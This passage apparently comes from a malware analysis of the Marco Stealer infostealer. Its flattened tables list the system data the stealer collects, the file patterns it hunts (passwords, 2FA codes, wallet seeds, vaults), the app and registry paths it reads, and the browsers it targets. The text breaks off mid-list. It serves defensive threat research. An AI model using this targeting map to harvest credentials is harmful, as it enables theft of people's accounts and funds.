the data collected by Marco Stealer.Client IDHardware IDIP addressCountry codeOS versionLocal dateTime zoneComputerNameAUserNameAHostnameComputerNameNetBIOSLanguageAntivirus softwareRAM sizeCPU vendorCPU nameCPU threadsCPU coresGPU(s)Display resolutionInstalled softwareRunning processesClipboard contentScreenshot data Targeted file patternsThe following tables show targeted file patterns (text, documents, spreadsheets, database, images, and backup files) identified using keywords.Private information*private*.txt*secret*.txt*important*.txt*note*.txt*data*.txt Credentials and authentication*password*.doc*pass*.txt*login*.txt*cred*.txt*auth*.txt*2fa*.txt*otp*.txt*account*.xls*ssn*.txt Cryptocurrency-related data*wallet*.txt*bitcoin*.txt*btc*.txt*eth*.txt*ledger*.txt*trezor*.txt*metamask*.txt*coinbase*.txt*binance*.txt*exodus*.txt*electrum*.txt*trust*.txt*seed*.png Financial data*bank*.jpg*card*.jpg*invoice*.pdf*tax*.pdf*backup*.sql*account*.accdb Password manager files*.kbdx*.kdb*.1pif*.opvault*.agilekeychain*.lastpass*.dashlane Screenshots or captured images*screen*.jpg*printscreen*.jpg*screenshot*.png*snip*.png*capture*.png Popular servicesThe following table includes the file paths or registry keys targeted, data collected, and additional technical details clarifying how this data is leveraged or encrypted/decoded.Function nameFile/registry pathData collectedAdditional informationDiscord DataAppDataRoamingDiscordLocal Storageleveldb AppDataRoamingDiscordptbLocal Storageleveldb AppDataRoamingDiscordcanaryLocal Storageleveldb AppDataRoamingLightcordLocal Storageleveldbtokens, cookies, and moreMarco Stealer retrieves file metadata using structures like nFileSizeLow, nFileSizeHigh, ftLastWriteTime, and dwFileAttributes, which help determine file presence, modification timestamps, and other file system attributes before attempting to read or extract the data.Telegram DataAppDataRoamingTelegram Desktoptdatacountries, key_datas, prefix, settings, shortcuts-custom.json, shortcuts-default.json, usertag, content.The decryption keys are stored locally in key_datas.Steam Video GameSoftwareValveSteama_1SoftwareValveSteamconfigconfig.vdfTo parse the contents of config.vdf, Marco Stealer employs a regular expression: “([^”]*)”s+”([^”]*)”.Proton VPNAppDataLocalProtonProton VPNData under “ProtonProton VPN”Marco Stealer performs a memory scan in the backward direction, searching for ProtonVPN-associated URLs like “ProtonVPN_Url” and content artifacts.FileZilla%APPDATA%FileZillarecentservers.xml, sitemanager.xmlThese XML files store FTP connection profiles, including host, port, username, and password fields, in plaintext or Base64-encoded plaintext.WindscribeHKEY_CURRENT_USERSoftwareWindscribeInstallerHKEY_CURRENT_USERSoftwareWindscribeWindscribe2capturing sensitive fields like authHash, userId, wireguardConfig, and customOvpnAuthsThese fields contain hashed credentials, unique user identifiers, VPN configuration for both OpenVPN and WireGuard, and internal VPN engine or networking settings.Ubisoft Game LauncherAppDataLocalUbisoft Game LauncherAll files at Ubisoft Game Launcher.* Battle.netAppDataLocalBattle.net“.config” and “.db” at given pathMarco Stealer specifically looks for critical files such as “.config” and “.db”, which may contain sensitive configuration or database information.OutlookSoftwareMicrosoftWindows MessagingSubsystemProfiles9375CFF0413111d3B88A00104B2A66768ASMTP Email Address2, SMTP Server, POP3 User Name9, NNTP Email Address, NNTP User Name, IMAP Server, IMAP User Name, Email, HTTP User, HTTP Server URL, POP3 User, IMAP User, HTTPMail User Name, HTTPMail Server, SMTP User, POP3 Password2, IMAP Password2, NNTP Password2, HTTPMail Password2, SMTP Password2, POP3 Password, IMAP Password, NNTP Password, and HTTPMail PasswordAfter decrypting the strings mentioned above, Marco Stealer enumerates them, indicating that the functionality is enumerating user email profile information from the registry.Password ManagerAppdataLocal(could be different for different password managers)1Password Nightly, commonkey, dashlane, KeePassXC, Keeper, LastPass, MYKI, NordPass, RoboForm, Splikity, Zoho Vault, 1Password Beta, BitwardenBy locating and accessing the data directories or configuration files associated with these applications, Marco Stealer attempts to extract saved credentials. Targeted browsersThe following table is a comprehensive list of browsers targeted by Marco Stealer.Google ChromeEpic Privacy BrowserAVAST Software BrowserLenovo SLBrowserBraveSoftwareGoogle Chrome DevCentBrowserComodo DragonBlackHawk BrowserCoowon CoowonGoogle Chrome BetaGoogle Chrome SxSBliskCryptoTab BrowserAVG BrowserInsomniacBrowserCCleaner BrowserLiebaoAIChromiumCatalinaGroup CitrioCocCoc BrowserMicrosoft Edge DevMicrosoft Edge “}]]
